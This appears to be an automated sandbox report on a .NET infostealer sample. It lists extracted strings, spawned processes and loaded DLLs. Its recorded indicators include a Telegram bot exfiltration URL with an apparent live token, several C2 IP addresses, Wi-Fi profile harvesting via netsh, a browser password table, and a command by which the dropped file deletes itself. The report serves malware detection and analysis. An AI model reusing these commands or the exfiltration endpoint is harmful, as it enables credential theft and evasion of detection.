                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                Source: build.exe, 00000002.00000002.2295681999.0000026B66B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://138.2.92.67:443
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://154.9.207.142:443
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://185.217.98.121:443
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://192.99.196.191:443
                Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://5.196.181.135:443
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tele
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D86000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage
                Source: build.exe, 00000002.00000002.2295681999.0000026B66D06000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=77347
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CAE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2301595940.0000026B76CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CAE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2301595940.0000026B76CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63170
                Source: unknownNetwork traffic detected: HTTP traffic on port 63170 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:63170 version: TLS 1.2

                System Summary

                barindex
                Source: build.exe.0.dr, cb9tD6.csLong String: Length: 11394
                Source: 0.2.file.exe.3685570.1.raw.unpack, cb9tD6.csLong String: Length: 11394
                Source: 0.2.file.exe.36bd1e8.0.raw.unpack, cb9tD6.csLong String: Length: 11394
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE9D2B NtQueryInformationToken,2_2_00007FFAACCE9D2B
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCEB115 NtQueryInformationToken,2_2_00007FFAACCEB115
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCEB305 NtQueryInformationToken,2_2_00007FFAACCEB305
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE304C2_2_00007FFAACCE304C
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCEEFFA2_2_00007FFAACCEEFFA
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCE72852_2_00007FFAACCE7285
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess token adjusted: Load DriverJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess token adjusted: SecurityJump to behavior
                Source: file.exe, 00000000.00000000.1233237472.00000000002F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs file.exe
                Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenames3c8aa2da262e434f4e3f03592028b88bd3d913.exed" vs file.exe
                Source: file.exe, 00000000.00000002.1237653819.00000000008A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenames3c8aa2da262e4 vs file.exe
                Source: file.exe, 00000000.00000002.1237653819.00000000007FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exeBinary or memory string: OriginalFileName vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: build.exe.0.dr, dD4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.36bd1e8.0.raw.unpack, dD4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.3685570.1.raw.unpack, dD4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: build.exe.0.dr, crH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: build.exe.0.dr, crH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.36bd1e8.0.raw.unpack, crH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.file.exe.36bd1e8.0.raw.unpack, crH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.file.exe.3685570.1.raw.unpack, crH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.file.exe.3685570.1.raw.unpack, crH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/5@2/4
                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_00007FFAACCEED85 AdjustTokenPrivileges,2_2_00007FFAACCEED85
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeMutant created: NULL
                Source: C:\Users\user\AppData\Local\Temp\build.exeMutant created: \Sessions\1\BaseNamedObjects\560ppofpuc
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: build.exe, 00000002.00000002.2295681999.0000026B66B48000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2295681999.0000026B66B35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: file.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
